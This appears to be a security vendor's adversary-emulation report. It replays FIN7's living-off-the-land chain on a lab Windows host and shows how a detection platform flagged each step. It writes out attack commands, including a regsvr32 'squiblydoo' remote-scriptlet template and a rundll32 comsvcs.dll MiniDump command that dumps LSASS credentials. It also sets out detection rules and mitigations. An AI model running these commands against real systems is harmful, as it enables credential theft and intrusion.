Scenario 03 · E-crime · Financially-motivated intrusion
FIN7 — Carbon Spider — barely brings its own tools. The point-of-sale-and-ransomware affiliate crew drives its payloads through binaries Windows already trusts, so the malicious step reads as routine administration. We ran their signature living-off-the-land chain by hand on a Windows victim and finished with an in-memory credential dump. THRONE told the trusted binary from the adversary behaviour every time — and caught the dump on the way out.
FIN7 — tracked by CrowdStrike as Carbon Spider and by MITRE as G0046 — is one of the most prolific financially-motivated crews on record. Its defining habit is proxy execution: running code through signed, built-in Windows binaries so a payload never surfaces as a strange new process. This report walks the full run end to end.
On a single Windows host we executed FIN7's hallmark living-off-the-land chain — an mshta JavaScript
loader, a regsvr32 "squiblydoo" scriptlet, a Windows Script Host dropper, and a WMI-spawned child
process — and then performed the move that makes this crew dangerous rather than merely noisy: a credential dump
of lsass.exe using the signed comsvcs.dll as a living-off-the-land MiniDump tool. None of
it carried a novel binary. All of it was observable.
The headline result: seven distinct detections from one run, spanning execution, defense evasion, persistence and credential access — every LOLBin flagged on its own, and the LSASS dump caught as a separate, higher-severity signal. The telemetry, the alert IDs, the ATT&CK mappings and the triage below are reproduced as captured in the lab.
FIN7 is an e-crime group, not a nation-state actor — money is the motive, and the tradecraft is tuned for scale, stealth and repeatability rather than for a single high-value target.
Active since at least 2015, FIN7 built its reputation on large-scale payment-card theft. The group ran long phishing campaigns against retail, restaurant and hospitality chains — primarily in the United States — dropping malware onto point-of-sale environments and scraping cardholder data at volume. Early operations leaned on the CARBANAK backdoor and a family of custom loaders and implants, most famously the JavaScript implant GRIFFON, delivered inside weaponised Office documents and shortcut files. To staff operations the group stood up a fake offensive-security company, "Combi Security," that recruited penetration testers who did not always know who they were really working for.
FIN7's operators have faced real-world consequences — the U.S. Department of Justice has indicted and, in multiple cases, secured guilty pleas from members of the group — yet the operation adapted and continued. Over the last several years security researchers have tracked Carbon Spider's pivot from card theft into big-game ransomware, including links to ransomware-as-a-service operations such as DarkSide, BlackMatter and ALPHV/BlackCat, and to further recruitment fronts dressed up as legitimate security firms. The group that once scraped magnetic-stripe data now also deploys enterprise-wide encryption and extortion.
What makes FIN7 worth emulating is not any one tool — it is a consistent preference for the land it is living
off. The MITRE ATT&CK profile for G0046 and years of public reporting describe a
group that reaches for signed Windows binaries again and again: mshta.exe to run HTA/JavaScript
(T1218.005), regsvr32.exe to execute remote scriptlets
(T1218.010), rundll32.exe as a proxy (T1218.011),
the Windows Script Host for VBScript and JScript droppers (T1059.005 /
T1059.007), WMI for stealthy process creation (T1047), PowerShell
for in-memory stages (T1059.001), and scheduled tasks and application shimming for
persistence (T1053.005, T1546.011). The through-line is
trusted-binary proxy execution: borrow something Windows already signs and allows, and the malicious action
hides inside expected behaviour. The subset we ran below is a faithful, non-destructive slice of exactly that
style.
The honest framing matters: this was a direct-execution run, not an autonomous command-and-control operation. We drove FIN7's techniques by hand and watched what THRONE made of them.
Every step ran on one Windows victim — WIN-J50RP1JBGD4 (204.168.192.149 · internal 10.0.0.5) — as a curated, non-destructive subset of the FIN7 playbook. We kept the recognisable loaders and the LSASS dump attempt and left out anything that would harm the host; there was no ransomware, no data theft, no destruction. We cleaned up afterward. This is a controlled technique test against real detection logic, not a live intrusion — and nothing in the lab is hidden: the hostname, both IP addresses, and every alert ID are shown as captured.
The host streams Sysmon telemetry to the THRONE cloud tenant. From the moment a process starts on the box to the moment a scored, investigable detection exists, the path is automatic and runs in seconds:
Each stage earns its place. Sysmon provides the high-fidelity process, command-line and image-load events Windows' own logging often omits. Tenant-tagged syslog keeps the stream attributable as it crosses into the cloud. Kafka decouples ingest from parsing so a burst never drops events; ch_pump normalises each record and lands it in ClickHouse, where the Sigma sweep runs 3,148 rules mapped across 389 ATT&CK techniques alongside a behavioral engine that scores relationships rather than single lines. Whatever fires is handed to ONYX — THRONE's AI SOC analyst — which triages the raw alerts, correlates them into one investigation, and rebuilds the causality tree. No analyst is in the loop until there is something worth looking at.
Every step below rode a binary that ships with Windows. THRONE flagged each one distinctly, then caught the credential-access move that followed. Here is the chain by ATT&CK tactic — what each command does, and why FIN7 reaches for it.
mshta.exe is the Microsoft HTML Application host. It will execute HTA files and inline
javascript: or vbscript: directly from the command line, pulling script from a local
path or a remote URL. Because mshta is a signed Microsoft binary, the code it runs inherits its
trust and never appears as a new, unknown executable on disk. This is precisely how FIN7 has historically staged
its GRIFFON JavaScript implant — the loader is the operating system's own tool, and the payload lives in script.
In ATT&CK this is System Binary Proxy Execution: Mshta.
"Squiblydoo" is the pattern regsvr32 /s /n /u /i:<url> scrobj.dll: regsvr32.exe is
told to register a COM scriptlet, and the scrobj.dll script engine fetches and executes a remote
.sct file — with no DLL ever written to disk and, on many configurations, no application-control
block. It is a near-canonical allow-list bypass, which is exactly why a financially-motivated crew that wants to
run everywhere, quietly, keeps it in the kit. The remote .sct scriptlet is itself a distinct,
flaggable artefact.
The dropper stage runs a VBScript (or JScript) file through wscript.exe / cscript.exe,
the Windows Script Host. Script droppers are cheap, easy to obfuscate, and look like the kind of automation that
is genuinely common on managed Windows estates — so they rarely stand out on their own. FIN7 has leaned on Script
Host droppers to unpack and launch later stages without compiling a single binary.
Windows Management Instrumentation can create processes locally or against a remote host. When a child process is
spawned by WmiPrvSE.exe — the WMI provider host — or launched via wmic process call
create, the parent is a core management service rather than a shell, which both hides the lineage and opens
a path to lateral movement. For a crew that spreads across an estate, WMI is a quiet way to execute that admins
themselves use every day.
schtasks.exe /create registers a task that re-launches a payload on a trigger — logon, a time, an
event. Scheduled tasks are a long-standing FIN7 persistence mechanism because they survive reboots, run with
predictable privilege, and are indistinguishable at a glance from the hundreds of legitimate tasks already on a
Windows box.
This is the pivot. rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump <lsass_pid> dump.bin
full abuses the signed comsvcs.dll's MiniDump export to write the full memory of
lsass.exe to disk — no Mimikatz, no ProcDump, nothing the operator had to bring. From that dump an
attacker recovers credentials and ticket material, and a payment-card crew turned ransomware affiliate uses those
credentials to move laterally and reach the servers worth encrypting. It is LSASS Memory credential dumping done
entirely with built-in tools, which is why THRONE scores it above the execution noise.
Within seconds of each binary running, Sigma and the behavioral engine fired and ONYX — THRONE's AI SOC analyst — triaged the alerts. The full wave from this one run on WIN-J50RP1JBGD4:
| Alert | Detection | Sev | ATT&CK |
|---|---|---|---|
| ALR-175444 | Suspicious JavaScript Execution Via Mshta.EXE | HIGH | T1218.005 |
| ALR-175441 | LSASS Dump Keyword In CommandLine | HIGH | T1003.001 |
| ALR-175446 | Scripting/CommandLine Process Spawned Regsvr32 | MED | T1218.010 |
| ALR-175445 | Dropper Script Execution Via WScript/CScript | MED | T1059.005 |
| ALR-175447/40 | WmiPrvSE / Wmic Spawned A Process | MED | T1047 |
| ALR-175443 | Execution of Suspicious File Type Extension (.sct) | MED | T1218.010 |
| ALR-175442 | Scheduled Task Creation Via Schtasks.EXE | LOW | T1053.005 |
Seven alerts, one run. Read down the severity column and the shape of the intrusion appears on its own: a cluster
of execution and defense-evasion signals at MED, a persistence signal held at
LOW, and two HIGH alerts that mark the moments that
matter — the mshta loader at the top of the chain and the LSASS dump at the end of it. The detail
behind the most important rows is below.
The most consequential detection in the run. This Sigma rule keys on command lines that carry the signature of an
LSASS memory dump — the MiniDump export, the comsvcs.dll image, and a process argument
resolving to lsass — regardless of which binary issues them. Because it watches the behaviour
(dumping LSASS) and not a named tool, it fires on the living-off-the-land rundll32 comsvcs.dll path
just as it would on Mimikatz. It maps to ATT&CK Credential Access, OS Credential Dumping: LSASS Memory, and
ONYX scored it HIGH — a credential-access event arriving after an execution chain
is the step most likely to precede lateral movement, so it anchors the incident.
This rule keys on mshta.exe invoked with inline script — a javascript: /
vbscript: handler or a scriptlet reference on the command line — rather than opening a benign local
HTA. That command-line shape is the tell that mshta is being used as a code loader, which is the
FIN7/GRIFFON pattern. Mapped to System Binary Proxy Execution: Mshta, it was raised HIGH
as the opening move of the chain and became, in ONYX's reconstruction, the root that the later steps descend from.
The squiblydoo pattern produced two correlated signals. The first keys on a scripting or command-line parent
spawning regsvr32.exe with the remote-scriptlet switches (/i: with a URL,
scrobj.dll); the second keys independently on execution of the suspicious .sct
scriptlet file type. Two rules describing one technique from different angles is a feature, not a duplication — it
raises confidence that this is squiblydoo and not a stray regsvr32 call. Both map to System Binary
Proxy Execution: Regsvr32 and were triaged MED, then folded into the same incident.
This detection keys on process-creation lineage: a child whose parent is WmiPrvSE.exe (or that was
created by wmic process call create). It is a relationship rule — the command itself may be
unremarkable, but the parentage is the signal. Mapped to Windows Management Instrumentation, it was scored
MED; on its own WMI execution is common on managed estates, but in the company of an
mshta loader and an LSASS dump, ONYX read it as part of the same hostile sequence rather than as
background administration.
Trusted-binary proxy execution is designed to blend in — mshta, regsvr32, wscript and wmic are all
legitimate parts of Windows, signed by Microsoft and present on every host. THRONE separates the legitimate
binary from the adversary behaviour riding it: it keys on command-line shape, process lineage and image loads,
not on a binary name or a hash. That is what lets it catch the comsvcs.dll LSASS MiniDump even
though no malware was ever written to disk.
Individual alerts are only half the story. THRONE rebuilds causality from Sysmon's process
identifiers — every process event carries a ProcessGuid and its ParentProcessGuid, so
parent-to-child links can be reconstructed exactly rather than guessed from timestamps.
In this run those links are what turn seven separate alerts into one picture. The mshta loader
(ALR-175444) sits at the root; the regsvr32 squiblydoo call
(ALR-175446 / ALR-175443) and the Windows Script Host dropper
(ALR-175445) descend from the execution stage; the WMI spawn
(ALR-175447/40) shows a child hanging off WmiPrvSE.exe rather than a shell;
and the credential dump (ALR-175441) appears as rundll32.exe reaching into
lsass.exe. Reading the tree, an analyst sees not six unrelated LOLBin events but a single sequence
that moves from a trusted-binary loader to a credential dump.
Because the tree is built from ProcessGuid / ParentProcessGuid rather than from
wall-clock proximity, it holds up even when unrelated activity is interleaved on a busy host — the parentage is
recorded by Sysmon at the moment each process starts, and ONYX walks those edges to assemble the incident.
The defensive lesson of a FIN7 run is uncomfortable: the adversary brought almost no tooling of its own and still lit up a full kill chain. The things that would catch a conventional attacker — a new binary, a bad hash, an unsigned executable — were never present.
That is what makes this crew hard. Every binary in the chain is signed by Microsoft and expected on the host, so allow-listing by name or trusting a signature catches nothing. The malicious content lives in script and in command-line arguments, not in files an antivirus engine will recognise, so the IOC surface is minimal. And the operation is deliberately shaped to look like administration: WMI process creation, scheduled tasks and script hosts are all things real admins do all day. A detection strategy built on "is this binary known-bad?" sees a quiet, legitimate Windows host right up until the credentials are gone.
The run also shows why the credential-access step is the one to anchor on. Execution and defense-evasion signals are where living-off-the-land is noisiest and most ambiguous; the LSASS dump is where intent becomes unmistakable. Catching the dump — and tying it back through the causality tree to the loader that started the chain — is the difference between seven low-context alerts and one explained incident.
Four concrete moves, each drawn directly from how this chain behaved.
Signed binaries defeat name- and hash-based controls, so the signal has to come from command-line shape and
parent/child relationships. Alert when mshta, regsvr32 or wscript run with
remote-script or inline-script arguments, when they are spawned by Office or a shell, or when
WmiPrvSE.exe is the parent of a new process. That is the layer FIN7 cannot hide in.
Watch for the dump behaviour itself — MiniDump, comsvcs.dll, and processes opening
handles to lsass.exe — independent of the tool used. A rule keyed on the behaviour catches the
living-off-the-land rundll32 comsvcs path and Mimikatz alike, and it should page, not queue.
Where the estate allows it, use application control (WDAC/AppLocker) and attack-surface-reduction rules to block
or constrain mshta, regsvr32 remote scriptlets and Windows Script Host execution, and
restrict outbound egress from these binaries so squiblydoo cannot fetch a remote .sct. You will not
remove every path, but you shrink the land there is to live off.
A low-IOC, living-off-the-land chain only becomes visible when individual events are mapped to technique and then correlated into a sequence. Ship high-fidelity Sysmon telemetry to a platform that scores by ATT&CK technique and rebuilds causality — so the credential-access step is automatically linked to the loader that started it, and an analyst inherits an explained incident rather than a pile of alerts.